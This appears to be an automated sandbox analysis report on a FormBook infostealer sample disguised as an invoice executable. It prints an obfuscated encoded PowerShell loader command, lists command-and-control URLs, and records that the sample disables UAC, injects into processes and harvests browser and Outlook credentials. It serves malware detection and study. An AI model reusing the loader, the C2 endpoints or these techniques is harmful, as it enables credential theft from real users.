a3adealaagadaaeaa4adaalaagadaaeabbadcalaagadaaeabeaemalaagadaaeabbadgalaagadaaeaa1aemalaagadaaeaayadyalaagadaaeaa5aeealaagadaaeaa3aeialaagadaaeaa5adialaagadaaeabeaeqalaagadaaeabfadcalaagadaaeaa3adyalaagadaaeabeadaalaagadaaeabdaeyalaagadaaeaa0adialaagadaaeaa5adaalaagadaaeabcaeialaagadaaeaa2aeyalaagadaaeaa1aeyalaagadaaeabdadqalaagadaaeabcadgalaagadaaeaaxaeqalaagadaaeabbadyalaagadaaeabcaeualaagadaaeabfadqalaagadaaeaa2aemalaagadaaeaazaduakqakacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeabfadcalaagadaaeaa5adkalaagadaaeaayadealaagadaaeaayadcalaagadaaeaa1aeealaagadaaeaayaeqalaagadaaeaazadealaagadaaeaa1admalaagadaaeaawaeualaagada
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedcommand wwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoauwbsaguazqbwacganqawadaamaapaaoacgakabieqaq1bdwenqq9bd0emarpbb8emaq/bdoemaqgad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabuaguabqbwafaayqb0aggakaapaaoajaaobdaemqq7bd4epqqgad0aiaanagyaaqbsagualqaqac4acab1ahqaaqbraccacgakab8epgrbbdsenqq0bd0eoaq5bcqemaq5bdseiaa9acaarwblahqalqbdaggaaqbsagqasqb0aguabqagac0auabhahqaaaagacqaegrabduepaq1bd0epqqwbe8ehwqwbd8eogqwbcaalqbgagkabab0aguacgagacqakaqwbdeeowq+bd0eiab8acaauwbvahiadaatae8aygbqaguaywb0acaatabhahmadabxahiaaqb0aguavabpag0azqagac0arablahmaywblag4azabpag4azwagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbgagkacgbzahqaiaaxaaoacgbmahuabgbjahqaaqbvag4aiaagbdaeqqribdgerarabd4emgqwbeietaqgahsacgagacaaiaagahaayqbyageabqagacgacgagacaaiaagacaaiaagacaawwbiahkadablafsaxqbdacqaggq7be4erwqsaaoaiaagacaaiaagacaaiaagafsaygb5ahqazqbbaf0axqakabgepqq4beyeoaqwbdseoaq3bdgeqardbe4esqq4bdkeegq1bdoeqgq+beaelaakacaaiaagacaaiaagacaaiabbagiaeqb0aguawwbdaf0ajaaubdaepqq9besenqqkacaaiaagacaakqakaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaqgad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbbaguacwbdadoaogbdahiazqbhahqazqaoackacgagacaaiaagacqakaq4beqeqaqwbeiepgrabc4atqbvagqazqagad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbdagkacaboaguacgbnag8azablaf0aoga6aemaqgbdaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaquafaayqbkagqaaqbuagcaiaa9acaawwbtahkacwb0aguabqauafmazqbjahuacgbpahqaeqauaemacgb5ahaadabvagcacgbhahaaaab5ac4auabhagqazabpag4azwbnag8azablaf0aoga6afaaswbdafmanwakaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybekeoaq6bcaapqagacqakaq4beqeqaqwbeiepgrabc4aqwbyaguayqb0aguarablagmacgb5ahaadabvahiakaakaboeowrobecelaagacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqpaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqgad0aiaakacaemarbbegeoarebeaepgqybekeoaq6bc4avabyageabgbzagyabwbyag0argbpag4ayqbsaeiababvagmaawaoacqafaqwbd0epqrlbduelaagadaalaagacqafaqwbd0epqrlbduelgbmaguabgbnahqaaaapaaoacqakacaaiaagacaacgblahqadqbyag4aiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqkah0acgakacqaggq7be4erwqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeaa1adaalaagadaaeabcadaalaagadaaeaa1aeialaagadaaeaazaeqalaagadaaeaa3adealaagadaaeaa4adaalaagadaaeabbadcalaagadaaeabeaemalaagadaaeabbadgalaagadaaeaa1aemalaagadaaeaayadyalaagadaaeaa5aeealaagadaaeaa3aeialaagadaaeaa5adialaagadaaeabeaeqalaagadaaeabfadcalaagadaaeaa3adyalaagadaaeabeadaalaagadaaeabdaeyalaagadaaeaa0adialaagadaaeaa5adaalaagadaaeabcaeialaagadaaeaa2aeyalaagadaaeaa1aeyalaagadaaeabdadqalaagadaaeabcadgalaagadaaeaaxaeqalaagadaaeabbadyalaagadaaeabcaeualaagadaaeabfadqalaagadaaeaa2aemalaagadaaeaazaduakqakacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeabfadcalaagadaaeaa5adkalaagadaaeaayadealaagadaaeaayadcalaagadaaeaa1aeealaagadaaeaayaeqalaagadaaeaazadealaagadaaeaa1admalaagadaaeaawaeualaagadaJump to behavior
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764665830.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000000.1488167071.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1642479909.0000000001991000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7341093F0 cpuid 6_2_00007FF7341093F0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: GetLocaleInfoW,6_2_00007FF7340F85D0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: GetLocaleInfoW,6_2_00007FF734103E74
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00007FF734103768
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00007FF734103FCC
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: GetLocaleInfoW,6_2_00007FF73410407C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: EnumSystemLocalesW,6_2_00007FF7340F8150
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00007FF7341041B0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: EnumSystemLocalesW,6_2_00007FF734103AC4
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: EnumSystemLocalesW,6_2_00007FF734103B94
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00007FF734103C2C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F267C GetSystemTimeAsFileTime,6_2_00007FF7340F267C

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disables UAC (registry)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		512
            Process Injection            		2
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		141
            Virtualization/Sandbox Evasion            		LSASS Memory261
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)1
            DLL Side-Loading            		512
            Process Injection            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information            		NTDS141
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync34
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1442718 Sample: Factura (3).exe Startdate: 16/05/2024 Architecture: WINDOWS Score: 100 42 www.zwervertjes.be 2->42 44 www.walletweb367.top 2->44 46 17 other IPs or domains 2->46 62 Snort IDS alert for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Antivirus detection for URL or domain 2->66 68 7 other signatures 2->68 11 Factura (3).exe 2 2->11         started        signatures3 process4 signatures5 76 Very long command line found 11->76 78 Encrypted powershell cmdline option found 11->78 14 powershell.exe 1 15 11->14         started        17 conhost.exe 11->17         started        process6 signatures7 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->84 86 Writes to foreign memory regions 14->86 88 3 other signatures 14->88 19 csc.exe 14->19         started        22 powershell.exe 23 14->22         started        24 WerFault.exe 20 16 14->24         started        26 2 other processes 14->26 process8 signatures9 70 Maps a DLL or memory area into another process 19->70 28 KAnMKAQhHABqpRuDRpLtww.exe 19->28 injected 72 Loading BitLocker PowerShell Module 22->72 31 conhost.exe 22->31         started        process10 signatures11 80 Found direct / indirect Syscall (likely to bypass EDR) 28->80 33 chkdsk.exe 13 28->33         started        process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 33->54 56 Tries to harvest and steal browser information (history, passwords, etc) 33->56 58 Modifies the context of a thread in another process (thread injection) 33->58 60 2 other signatures 33->60 36 KAnMKAQhHABqpRuDRpLtww.exe 33->36 injected 40 firefox.exe 33->40         started        process14 dnsIp15 48 lenslaser.com 162.241.216.140, 49714, 49716, 49717 UNIFIEDLAYER-AS-1US United States 36->48 50 www.walletweb367.top 91.195.240.123, 49731, 49732, 49733 SEDO-ASDE Germany 36->50 52 7 other IPs or domains 36->52 74 Found direct / indirect Syscall (likely to bypass EDR) 36->74 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Factura (3).exe34%ReversingLabsWin64.Trojan.Swotter

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://www.deaybrid.info/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA==0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw==0%Avira URL Cloudsafe
            http://www.zwervertjes.be/mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK0%Avira URL Cloudsafe
            http://www.carliente.com/mcz6/0%Avira URL Cloudsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.carliente.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA==0%Avira URL Cloudsafe
            http://www.walletweb367.top/mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK0%Avira URL Cloudsafe
            http://www.lenslaser.com/mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK0%Avira URL Cloudsafe
            http://www.dty377.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw==0%Avira URL Cloudsafe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%Avira URL Cloudsafe
            http://www.allinone24.shop/mcz6/0%Avira URL Cloudsafe
            http://www.zwervertjes.be0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://www.lenslaser.com/mcz6/0%Avira URL Cloudsafe
